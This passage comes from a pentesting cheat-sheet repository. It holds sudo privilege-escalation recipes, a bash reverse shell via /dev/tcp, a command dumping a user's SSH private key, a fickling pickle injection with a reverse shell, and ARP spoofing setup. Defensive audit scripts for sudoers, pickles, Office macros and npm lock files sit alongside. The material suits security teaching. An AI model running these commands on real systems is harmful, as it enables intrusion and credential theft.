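    if ")" in cmd_specs:  # drop the (runas) part
        cmd_specs = cmd_specs.split(")", 1)[1]
    for spec in cmd_specs.split(","):
        # Skip tags such as NOPASSWD:; tokens[0] is then the command itself.
        tokens = [t for t in spec.split() if not t.endswith(":")]
        for arg in tokens[1:]:
            if any(ch in arg for ch in "*?["):
                findings.append(arg)
    return findings


if __name__ == "__main__":
    print("glob accepts traversal path:", sudo_pattern_matches(RULE_PATTERN, TRAVERSAL_ARG))
    print("resolves to:", os.path.normpath(TRAVERSAL_ARG))
    print("wildcard args:", audit_sudoers_line(f"alice ALL=(ALL) NOPASSWD: /usr/bin/node {RULE_PATTERN}"))
```

A rule without a wildcard, or one whose arguments are checked by a wrapper script that rejects anything outside the intended directory, is the fix the audit points at.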
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-screen-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Screen Privilege Escalation
3 | description: Sudo screen command might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (root) /usr/bin/screen -r testsession
17 | ```
18 |
19 | If we can execute **"screen"** command as root, we can spawn a root shell from the screen session.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | First execute the **"screen"** command as root, and a screen session will start.
26 | Now we can spawn a root shell by pressing **“Ctrl+a”** then **“c”** in the screen session.
27 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Shutdown, Poweroff Privilege Escalation
3 | description: Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (ALL) NOPASSWD: /usr/sbin/shutdown
17 | ```
18 |
19 | If we can execute the **"shutdown"** command as root, we can gain root privileges by placing our own **"poweroff"** earlier in **PATH** than the real one.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | First create a **/tmp/poweroff** script which invokes a shell.
26 |
27 | ```sh
28 | echo /bin/sh > /tmp/poweroff
29 | # or
30 | echo /bin/bash > /tmp/poweroff
31 | ```
32 |
33 | Then change permissions of the file and add **"/tmp"** folder to **PATH**.
34 |
35 | ```sh
36 | chmod +x /tmp/poweroff
37 | export PATH=/tmp:$PATH
38 | ```
39 |
40 | Now execute **"shutdown"** as root.
41 |
42 | ```sh
43 | # Some SUID command
44 | sudo /usr/sbin/shutdown
45 |
46 | # Then you are root user
47 | root>
48 | ```
49 |
50 | **/tmp/poweroff** is executed and spawns a root shell.
51 |
52 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-umount-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Umount Privilege Escalation
3 | description: Sudo umount is vulnerable to privilege escalation.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-15
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | sudo -l
15 |
16 | (root) NOPASSWD: /bin/umount
17 | ```
18 |
19 | If we can execute the umount command as root, we may be able to escalate privileges.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | On the target machine, check which directories are mounted.
26 |
27 | ```bash
28 | cat /etc/fstab
29 | showmount -e localhost
30 | ```
31 |
32 | Assume the **`/opt/example`** folder is mounted.
33 | If we unmount this folder, the original files that existed before the directory was mounted may appear.
34 |
35 | ```bash
36 | sudo /bin/umount /opt/example
37 | ls -al /opt/example
38 | ```
39 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-wall-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Wall Privilege Escalation
3 | description: Wall command can display the result of OS command. Executing as root might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (ALL) NOPASSWD: wall
17 | ```
18 |
19 |
20 |
21 | ## Exploitation
22 |
23 | ```sh
24 | # Reverse shell
25 | sudo wall "$(bash -c 'bash -i >& /dev/tcp/<local-ip>/<port> 0>&1')"
26 |
27 | # Read the SSH private key of another user
28 | sudo wall "$(cat /home/user/.ssh/id_rsa)"
29 | ```
30 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudoedit Privilege Escalation
3 | description: Sudoedit is vulnerable to privilege escalation.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | - https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
8 | date: 2023-03-29
9 | draft: false
10 | ---
11 |
12 | ## Investigation
13 |
14 | ```bash
15 | sudo -l
16 |
17 | (root) sudoedit /opt/example.txt
18 | ```
19 |
20 | If we can execute the sudoedit command as root, we might be able to escalate privileges with some versions.
21 |
22 |
23 |
24 | ## Exploitation ([CVE-2023-22809](https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf))
25 |
26 | ```bash
27 | export EDITOR="vim -- /etc/sudoers"
28 | sudoedit /opt/example.txt
29 | ```
30 |
31 | In the vim editor, add the following line to **`/etc/sudoers`**.
32 | Assume the current username is “john”.
33 |
34 | ```bash
35 | john ALL=(ALL:ALL) ALL
36 | ```
37 |
38 | After that, we can escalate to root.
39 |
40 | ```bash
41 | sudo su root
42 | ```
43 |
--------------------------------------------------------------------------------
/src/exploit/linux/protocol/_data.yml:
--------------------------------------------------------------------------------
1 | category2: protocol
--------------------------------------------------------------------------------
/src/exploit/linux/protocol/x11-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: X11 (X Window System) Pentesting
3 | description: The X Window System is a windowing system for bitmap displays, common on Unix-like operating systems. Default ports are 6000, 6001.
4 | tags:
5 | - Linux
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script x11-access -p 6000 <target-ip>
15 |
16 | msf> use auxiliary/scanner/x11/open_x11
17 | ```
18 |
--------------------------------------------------------------------------------
/src/exploit/machine-learning/_data.yml:
--------------------------------------------------------------------------------
1 | category1: machine-learning
2 | related_menus:
3 | - title: Data Processing
4 | id: data-processing
5 | - title: Computer Vision
6 | id: computer-vision
7 | - title: LLM
8 | id: llm
9 | - title: Model
10 | id: model
11 | - title: Others
12 | id: others
--------------------------------------------------------------------------------
/src/exploit/machine-learning/computer-vision/Image-Recognition-Bypass-for-Machine-Learning.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Image Recognition Bypass for Machine Learning
3 | description: We can trick image recognizer or classifier by adding filters or obfuscating an image.
4 | tags:
5 | - Computer Vision
6 | - Machine Learning
7 | refs:
8 | date: 2023-08-18
9 | draft: false
10 | ---
11 |
12 | Some of the following techniques may already be ineffective, or may become ineffective in the future.
13 |
14 | ## Blurring
15 |
16 | ```python
17 | from PIL import Image
18 | from PIL import ImageFilter
19 |
20 | img = Image.open("example.png")
21 |
22 | # Box blur
23 | img1 = img.filter(ImageFilter.BoxBlur(5))
24 | # Gaussian blur
25 | img2 = img.filter(ImageFilter.GaussianBlur(5))
26 | # Median filter
27 | img3 = img.filter(ImageFilter.MedianFilter(size=5))
28 | # Rank filter
29 | img4 = img.filter(ImageFilter.RankFilter(size=13, rank=5))
30 | ```
31 |
32 |
33 |
34 | ## Cropping/Rotating
35 |
36 | ```python
37 | from PIL import Image
38 | from PIL import ImageFilter
39 |
40 | img = Image.open("example.png")
41 | img = img.resize((512, 512))
42 |
43 | img1 = img.crop((0, 0, 300, 280)).rotate(-60)
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/machine-learning/computer-vision/_data.yml:
--------------------------------------------------------------------------------
1 | category2: computer-vision
--------------------------------------------------------------------------------
/src/exploit/machine-learning/data-processing/_data.yml:
--------------------------------------------------------------------------------
1 | category2: data-processing
--------------------------------------------------------------------------------
/src/exploit/machine-learning/data-processing/data-visualization-for-machine-learning.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Data Visualization for Machine Learning
3 | description:
4 | tags:
5 | - Machine Learning
6 | refs:
7 | date: 2024-06-19
8 | draft: false
9 | ---
10 |
11 | ## Simple Example
12 |
13 | ```py
14 | import pandas as pd
15 | import matplotlib.pyplot as plt
16 |
17 | df = pd.read_csv('example.csv', index_col=0)
18 |
19 | plt.figure(figsize=(5, 6))
20 |
21 | # Choose a graph type
22 | plt.bar(df['Name'], df['Age'], color='red')
23 | # or
24 | plt.scatter(df['Name'], df['Age'], alpha=0.5)
25 |
26 | # Set title and labels
27 | plt.title("Example Title")
28 | plt.xlabel("Name")
29 | plt.ylabel("Age")
30 |
31 | # Display
32 | plt.show()
33 | ```
--------------------------------------------------------------------------------
/src/exploit/machine-learning/data-processing/dimensionality-reduction-for-machine-learning.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Dimensionality Reduction for Machine Learning
3 | description: Dimensionality Reduction is a data processing step that reduces the number of input features so that machine learning models are easier to train.
4 | tags:
5 | - Data Processing
6 | - Machine Learning
7 | refs:
8 | - https://www.kaggle.com/competitions/ai-village-ctf
9 | date: 2023-08-20
10 | draft: false
11 | ---
12 |
13 | ## PCA (Principal Component Analysis)
14 |
15 | Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42)
16 |
17 | We use **PCA** to see how much of the variance each principal component explains, which tells us how many dimensions the data actually needs.
18 |
19 | ```python
20 | import numpy as np
21 | from sklearn.decomposition import PCA
22 |
23 | data = np.load("example.npy")
24 |
25 | for i in range(1, 10):
26 | pca = PCA(n_components=i)
27 | principal_components = pca.fit_transform(data)
28 | print(pca.explained_variance_ratio_)
29 | ```
30 |
--------------------------------------------------------------------------------
/src/exploit/machine-learning/llm/_data.yml:
--------------------------------------------------------------------------------
1 | category2: llm
--------------------------------------------------------------------------------
/src/exploit/machine-learning/model/_data.yml:
--------------------------------------------------------------------------------
1 | category2: model
--------------------------------------------------------------------------------
/src/exploit/machine-learning/model/pickle-code-injection.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Pickle Code Injection
3 | description:
4 | tags:
5 | - Machine Learning
6 | refs:
7 | - https://github.com/trailofbits/fickling
8 | - https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/
9 | - https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html
10 | date: 2024-07-17
11 | draft: false
12 | ---
13 |
14 | ## Exploit
15 |
16 | A pickle is a small program for a stack machine rather than inert data: the `GLOBAL`/`STACK_GLOBAL` and `REDUCE` opcodes make `pickle.load()` import a module and call a function with attacker-chosen arguments. `fickling --inject` prepends such a call to an existing pickle and leaves the original object intact, so the payload runs as soon as the file is loaded (by `pickle.load`, `torch.load`, `joblib.load` and similar) while the victim still gets the model they expected.
17 |
18 | ```bash
19 | # Inject a shell command that runs when example.pkl is loaded
20 | fickling --inject "import os; os.system('/bin/bash')" example.pkl
21 |
22 | # Reverse shell (replace "10.0.0.1" and 4444 with your own)
23 | fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl
24 | ```
25 |
26 | Before loading a pickle from an untrusted source, disassemble it without executing it (`python -m pickletools example.pkl`) and look for imports a model file has no reason to make, such as `os`, `subprocess`, `socket` or `builtins.exec`.
27 |
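The detection side of the technique above, as an added example that is not fickling's or PyTorch's code: it builds a pickle whose `__reduce__` calls `os.system` (the same shape `--inject` produces), lists every global the stream would import without executing it, flags the dangerous ones, and shows a `find_class` allowlist that refuses to resolve them. The function names (`build_malicious_pickle`, `referenced_globals`, `suspicious_globals`, `safe_loads`, `loads_refused`, `benign_pickle`), the module denylist and the samples are this example's own assumptions.

```python
"""Inspect a pickle for the callables it will invoke, then load it under an
allowlist. Added example; not fickling's or PyTorch's own code. The function
names (build_malicious_pickle, referenced_globals, suspicious_globals,
safe_loads, loads_refused, benign_pickle) are this example's own."""
import io
import os
import pickle
import pickletools

# Modules a serialized model has no business importing. A GLOBAL into one of
# these is treated as an injected payload (assumed list, extend as needed).
DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "socket", "pty", "sys",
                     "importlib", "runpy", "shutil", "code", "pydoc", "webbrowser"}
DANGEROUS_BUILTINS = {"eval", "exec", "compile", "open", "__import__", "getattr"}
STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}


class _Payload:
    """Shape of an injected object: __reduce__ tells pickle to reconstruct it
    by calling os.system(cmd), which happens inside pickle.load()."""
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def build_malicious_pickle(cmd, protocol=4):
    """Constructed sample of what an injected pickle looks like."""
    return pickle.dumps(_Payload(cmd), protocol=protocol)


def benign_pickle():
    """Constructed sample of a harmless pickle (plain containers only)."""
    return pickle.dumps({"weights": [0.5, -1.25]}, protocol=4)


def referenced_globals(data):
    """Return 'module.name' for every GLOBAL/STACK_GLOBAL opcode, without
    executing anything. Strings are tracked through the memo so that a module
    name pushed once and re-used via BINGET is still resolved."""
    refs, strs, memo, last = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name == "GLOBAL":                 # protocol <= 3: "module name"
            refs.append(arg.replace(" ", ".", 1))
            last = None
        elif name == "STACK_GLOBAL":         # protocol >= 4: two strings on the stack
            qual = strs.pop() if strs else "?"
            mod = strs.pop() if strs else "?"
            refs.append(f"{mod}.{qual}")
            last = None
        elif name in STRING_OPS:
            strs.append(arg)
            last = arg
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if last is not None:
                strs.append(last)
        elif name == "MEMOIZE":
            memo[len(memo)] = last
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        else:                                # anything else pushes a non-string
            last = None
    return refs


def suspicious_globals(data):
    """Subset of referenced_globals() that should never appear in a model file."""
    bad = []
    for ref in referenced_globals(data):
        mod, _, qual = ref.partition(".")
        if mod in DANGEROUS_MODULES or (mod == "builtins" and qual in DANGEROUS_BUILTINS):
            bad.append(ref)
    return bad


# Globals the loader may resolve. Anything else raises before it is called.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"),
                ("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_refused(data):
    """True if safe_loads() rejects the pickle instead of executing it."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    blob = build_malicious_pickle("echo pickle payload executed")
    print("globals:", referenced_globals(blob))
    print("suspicious:", suspicious_globals(blob))
    print("refused by restricted loader:", loads_refused(blob))
    # pickle.loads(blob) or torch.load() without weights_only=True would run
    # the command at this point.
```

`referenced_globals()` is a heuristic reader of the opcode stream, not a full unpickler, so a deliberately convoluted stream could hide an import from it; the allowlist in `RestrictedUnpickler` is the control that actually blocks execution, and it has to be extended with whatever classes your model format legitimately needs.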
--------------------------------------------------------------------------------
/src/exploit/machine-learning/orange-data-mining.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Orange Data Mining
3 | description: Orange is a data-mining and machine learning software that allows users to analyze data, create visualizations, and build predictive models.
4 | tags:
5 | - Machine Learning
6 | refs:
7 | - https://orange3.readthedocs.io/projects/orange-visual-programming/en/latest/index.html
8 | date: 2023-03-20
9 | draft: false
10 | ---
11 |
12 | ## Installation & Start
13 |
14 | On Linux, Orange can be installed with pip:
15 |
16 | ```bash
17 | pip install PyQt5 PyQtWebEngine
18 | pip install orange3
19 | ```
20 |
21 |
22 |
23 | ## Basic Usage
24 |
25 | ### 1. Start Orange Software
26 |
27 | ```bash
28 | python -m Orange.canvas
29 | ```
30 |
31 | ### 2. Open .OWS File
32 |
33 | When Orange starts, open a “.ows” workflow file.
34 |
35 | ### 3. Import Data File
36 |
37 | Add the File widget in the left pane, and import data file such as “.csv”.
38 |
39 | ### 4. Workflows
40 |
41 | Connect the File widget with the Scatter Plot widget and open the Scatter Plot. We can see the data with plot.
--------------------------------------------------------------------------------
/src/exploit/machine-learning/read-pt.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Read PT File
3 | description: A PT file is a machine learning model file generated by PyTorch. It contains pickled Python objects, so loading one with torch.load() can execute code embedded in the file.
4 | tags:
5 | - Machine Learning
6 | refs:
7 | date: 2023-03-26
8 | draft: false
9 | ---
10 |
11 | ## Load Model from PT
12 |
13 | ```python
14 | import torch
15 | import torch.nn as nn
16 |
17 | class ExampleModel(nn.Module):
18 | def __init__(self):
19 | super().__init__()
20 | self.flatten = nn.Flatten()
21 | self.linear_relu_stack = nn.Sequential(
22 | nn.Linear(28*28, 512),
23 | nn.ReLU(),
24 | nn.Linear(512, 10))
25 |
26 | def forward(self, x):
27 | x = self.flatten(x)
28 | logits = self.linear_relu_stack(x)
29 | return logits
30 |
31 | model = ExampleModel()
32 | model.load_state_dict(torch.load('example.pt', weights_only=True))  # weights_only restricts unpickling to tensors and primitive types; drop it only for files you trust
33 | print(model)
34 | ```
--------------------------------------------------------------------------------
/src/exploit/malware/_data.yml:
--------------------------------------------------------------------------------
1 | category1: malware
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/malware/maldoc-analysis.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Maldoc Analysis
3 | description: Malicious documents (maldocs) are Microsoft Office files that carry code, typically VBA macros, which executes when the document is opened.
4 | tags:
5 | - Malware
6 | refs:
7 | date: 2023-08-06
8 | draft: false
9 | ---
10 |
11 | ## Static Analysis
12 |
13 | ### Extract Files in Doc
14 |
15 | Office documents come in two containers. OOXML files (`.docx`, `.docm`, `.xlsm`, ...) are zip archives and can be unpacked; a macro-enabled file keeps its VBA project in `word/vbaProject.bin` (or `xl/vbaProject.bin`). Legacy binary files (`.doc`, `.xls`, `.ppt`) are OLE2 compound files, which `unzip` cannot read; use `olevba` (below) for those. Check the actual container rather than trusting the extension: a `.docm` renamed to `.doc` still opens in Word and still runs its macros.
16 |
17 | ```bash
18 | # Only works if the file is really a zip (OOXML) container, whatever its extension says
19 | unzip example.doc
20 | ```
21 |
22 | ### Find Interesting Information
23 |
24 | ```bash
25 | strings example.doc
26 | exiftool example.doc
27 | binwalk -e example.doc
28 | ```
29 |
30 | Additionally, we can use CyberChef. Follow these steps:
31 |
32 | 1. Open **CyberChef**.
33 | 2. Upload the suspicious doc file to CyberChef.
34 | 3. Use the **"Strings"** operation to extract strings.
35 | 4. If the results contain obfuscated strings, add the **"Find / Replace"** operation to remove the extra characters.
36 | 5. If necessary, add the **"Drop bytes"** operation to remove extra bytes.
37 |
38 | ### Dump Macros
39 |
40 | If you don’t have `oletools`, install it first.
41 |
42 | ```bash
43 | # Install the `oletools` module in a virtual environment
44 | python -m venv venv
45 | source venv/bin/activate
46 | pip install oletools
47 | ```
48 |
49 | To dump macros, run the following command. `olevba` handles both OLE2 and OOXML files. `-c` prints only the VBA source; without it you also get the analysis table of auto-execute and suspicious keywords (AutoOpen, Document_Open, Shell, CreateObject, ...).
50 |
51 | ```bash
52 | olevba -c example.doc
53 | ```
54 |
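The triage step that decides between `unzip`, `olevba` and `rtfobj`, as an added example that is not part of oletools: it identifies the container from the leading bytes, checks for a VBA project (the `vbaProject.bin` part in OOXML, the UTF-16LE `_VBA_PROJECT` stream name in OLE2) and reports when the extension lies about the container. `triage()`, `mismatched_extension()` and the sample builders are this example's own names, and the samples are constructed in memory (no real malware).

```python
"""Classify an Office file by container and check for a VBA project before
picking a tool. Added example; not part of oletools. triage(),
mismatched_extension() and the sample builders are this example's own, and
the samples are constructed in memory (no real malware)."""
import io
import os
import zipfile

OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # legacy .doc/.xls/.ppt (CFB)
ZIP_MAGIC = b"PK\x03\x04"                           # OOXML .docx/.docm/.xlsm ...
RTF_MAGIC = b"{\\rt"
# CFB directory entries store stream names as UTF-16LE; every VBA project has
# a stream literally named _VBA_PROJECT, so its encoded form is a cheap marker
# (heuristic: a damaged or non-standard container could hide it).
VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")
LEGACY_EXT = {".doc", ".dot", ".xls", ".xlt", ".ppt"}
OOXML_EXT = {".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm"}


def triage(data):
    """Return container type, whether VBA is present and which tool to run next."""
    info = {"container": "unknown", "has_vba": False, "entries": [], "next_tool": "file / strings"}
    if data.startswith(OLE2_MAGIC):
        info["container"] = "ole2"
        info["has_vba"] = VBA_MARKER in data
        info["next_tool"] = "olevba -c"
    elif data.startswith(ZIP_MAGIC):
        info["container"] = "ooxml"
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            info["entries"] = zf.namelist()
        # a macro-enabled file carries its VBA project as word/xl/ppt/vbaProject.bin
        info["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in info["entries"])
        info["next_tool"] = "unzip, then olevba -c"
    elif data.startswith(RTF_MAGIC):
        info["container"] = "rtf"          # RTF cannot hold macros but can embed OLE objects
        info["next_tool"] = "rtfobj"
    return info


def mismatched_extension(filename, data):
    """True when the extension promises one container but the bytes are another,
    e.g. a macro-enabled .docm renamed to .doc (Word still opens and runs it)."""
    ext = os.path.splitext(filename.lower())[1]
    container = triage(data)["container"]
    return (ext in LEGACY_EXT and container == "ooxml") or (ext in OOXML_EXT and container == "ole2")


def sample_ooxml(with_macro):
    """Constructed minimal OOXML zip; real files carry many more parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 32)
    return buf.getvalue()


def sample_ole2(with_macro):
    """Constructed stand-in for an OLE2 file: only the header signature and,
    optionally, a directory-entry name; enough for the heuristic above."""
    body = OLE2_MAGIC + b"\x00" * 504
    if with_macro:
        body += VBA_MARKER + b"\x00" * 40
    return body


if __name__ == "__main__":
    for label, blob in (("renamed docm", sample_ooxml(True)), ("legacy doc", sample_ole2(True))):
        print(label, triage(blob), "ext mismatch:", mismatched_extension("invoice.doc", blob))
```

For a real file, read it with `open(path, "rb").read()` and pass the bytes to `triage()`; treat `has_vba` as a hint to run `olevba`, not as a verdict, since the OLE2 check is a byte search rather than a parse of the compound file.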
--------------------------------------------------------------------------------
/src/exploit/malware/npm-supply-chain-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: NPM Supply Chain Attack
3 | description: An attacker might be able to lead an organization to install a malicious NPM package by abusing misconfiguration of the internal proxy server or package manager.
4 | tags:
5 | - Malware
6 | - Supply Chain
7 | refs:
8 | - https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
9 | - https://snyk.io/blog/npm-security-preventing-supply-chain-attacks/
10 | date: 2023-07-12
11 | draft: false
12 | ---
13 |
14 | This page is still incomplete.
15 |
16 | ## Dependency Confusion
17 |
18 | If a project depends on a package that exists only in a private registry, and the package manager also consults the public registry for that name, an attacker who publishes a package with the same name and a higher version on the public registry can get it installed in place of the internal one. The technique is described in the dependency confusion write-up listed in the references; a [PoC](https://github.com/x1337loser/Dependency-Confusion) repository is also available.
19 |
20 |
21 |
22 | ## Lock File Injection
23 |
24 | Attackers may insert their malicious npm package into **`yarn.lock`** or **`package-lock.json`** in the target project. Lock files are generated, large and rarely reviewed in pull requests, yet `npm ci` and `yarn install --frozen-lockfile` install exactly what they say: a `resolved` URL pointing at an attacker-controlled host, paired with an `integrity` hash the attacker computed for that tarball, installs without complaint.
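Both attacks above leave traces in `package-lock.json`, so here is a lock-file audit as an added example (not from the referenced write-ups): it flags tarballs resolved outside the registries you allow, entries without an `integrity` hash, and internal package names that resolve to the public registry. `audit_lock()`, `iter_packages()`, the internal names and `SAMPLE_LOCK` (with obviously fake integrity values) are this example's own constructions.

```python
"""Audit package-lock.json for lock-file injection and dependency-confusion
exposure. Added example; not from the referenced write-ups. The functions,
the internal package names and SAMPLE_LOCK (including its fake integrity
values) are this example's own constructions."""
import json

PUBLIC_REGISTRY = "https://registry.npmjs.org/"


def iter_packages(lock):
    """Yield (name, record) for lockfileVersion 2/3 ('packages', keyed by
    path) and lockfileVersion 1 (nested 'dependencies')."""
    packages = lock.get("packages")
    if packages is not None:
        for path, rec in packages.items():
            if path == "":                     # the root project entry
                continue
            yield path.rsplit("node_modules/", 1)[-1], rec
        return

    def walk(deps):
        for name, rec in deps.items():
            yield name, rec
            yield from walk(rec.get("dependencies", {}))
    yield from walk(lock.get("dependencies", {}))


def audit_lock(lock, internal_names=(), allowed_registries=(PUBLIC_REGISTRY,)):
    """Return (package, finding) pairs. internal_names are packages that must
    never come from the public registry; allowed_registries are the only
    hosts a tarball may be fetched from."""
    findings = []
    for name, rec in iter_packages(lock):
        if rec.get("link"):                    # workspace symlink, no tarball
            continue
        resolved = rec.get("resolved", "")
        if not resolved:
            findings.append((name, "no resolved URL"))
        elif not resolved.startswith(tuple(allowed_registries)):
            findings.append((name, f"resolved outside allowed registries: {resolved}"))
        if not rec.get("integrity"):
            findings.append((name, "missing integrity hash"))
        if name in internal_names and resolved.startswith(PUBLIC_REGISTRY):
            findings.append((name, "internal package resolved from the public registry (dependency confusion)"))
    return findings


def audit_file(path, **kwargs):
    with open(path, encoding="utf-8") as fh:
        return audit_lock(json.load(fh), **kwargs)


# Constructed lock file: one normal entry, one tarball from a foreign host,
# one internal name served by the public registry, one entry without integrity.
SAMPLE_LOCK = {
    "name": "acme-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "acme-app"},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": PUBLIC_REGISTRY + "left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-FAKEFAKE"},
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "https://cdn.attacker.example/lodash-4.17.21.tgz",
            "integrity": "sha512-FAKEFAKE"},
        "node_modules/acme-auth": {
            "version": "99.0.0",
            "resolved": PUBLIC_REGISTRY + "acme-auth/-/acme-auth-99.0.0.tgz",
            "integrity": "sha512-FAKEFAKE"},
        "node_modules/acme-utils": {
            "version": "1.2.0",
            "resolved": "https://npm.acme.internal/acme-utils/-/acme-utils-1.2.0.tgz"},
    },
}
INTERNAL = {"acme-auth", "acme-utils"}
ALLOWED = (PUBLIC_REGISTRY, "https://npm.acme.internal/")


if __name__ == "__main__":
    for pkg, finding in audit_lock(SAMPLE_LOCK, INTERNAL, ALLOWED):
        print(f"{pkg}: {finding}")
```

Run it as a CI gate with `audit_file("package-lock.json", internal_names=..., allowed_registries=...)`. The structural fix for the dependency-confusion finding is to pin the internal scope to the private registry in `.npmrc` (for example `@acme:registry=https://npm.acme.internal/`) so public lookups for those names never happen.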
--------------------------------------------------------------------------------
/src/exploit/memory/_data.yml:
--------------------------------------------------------------------------------
1 | category1: memory
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/mobile/_data.yml:
--------------------------------------------------------------------------------
1 | category1: mobile
2 | related_menus:
3 | - title: Android
4 | id: android
--------------------------------------------------------------------------------
/src/exploit/mobile/android/_data.yml:
--------------------------------------------------------------------------------
1 | category2: android
--------------------------------------------------------------------------------
/src/exploit/network/_data.yml:
--------------------------------------------------------------------------------
1 | category1: network
2 | related_menus:
3 | - title: Protocol
4 | id: protocol
5 | - title: Port Forwarding
6 | id: port-forwarding
7 | - title: WiFi
8 | id: wifi
9 | - title: Attack
10 | id: attack
11 | - title: Tool
12 | id: tool
13 | - title: VPN
14 | id: vpn
15 | - title: Others
16 | id: others
--------------------------------------------------------------------------------
/src/exploit/network/arp-spoofing.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ARP (Address Resolution Protocol) Spoofing
3 | description: ARP is used to find another computer’s MAC address based on its IP address.
4 | tags:
5 | - Network
6 | refs:
7 | date: 2022-11-22
8 | draft: false
9 | ---
10 |
11 | ## Basic Flow
12 |
13 | 1. **Check Interface and Gateway IP Address**
14 |
15 | ```sh
16 | # Interfaces
17 | ip addr
18 |
19 | # Default gateway
20 | ip route list
21 | ```
22 |
23 | 2. **Scan the Network to Find Target IP**
24 |
25 | ```sh
26 | # Ping scan (-sn; -sP is the old name for the same option)
27 | nmap -sn <network>/24
28 | nmap -sn <network>/16
29 | ```
30 |
31 | 3. **Enable IP Forwarding**
32 |
33 | Without forwarding, packets the victim sends to our MAC are dropped and the victim loses connectivity, which gives the attack away. Forwarding is a kernel setting; the iptables rule only makes sure the firewall does not drop the forwarded packets.
34 |
35 | ```sh
36 | # Turn on forwarding in the kernel (not persistent across reboots)
37 | sysctl -w net.ipv4.ip_forward=1
38 | # or
39 | echo 1 > /proc/sys/net/ipv4/ip_forward
40 |
41 | # Allow all forwarding in the LAN
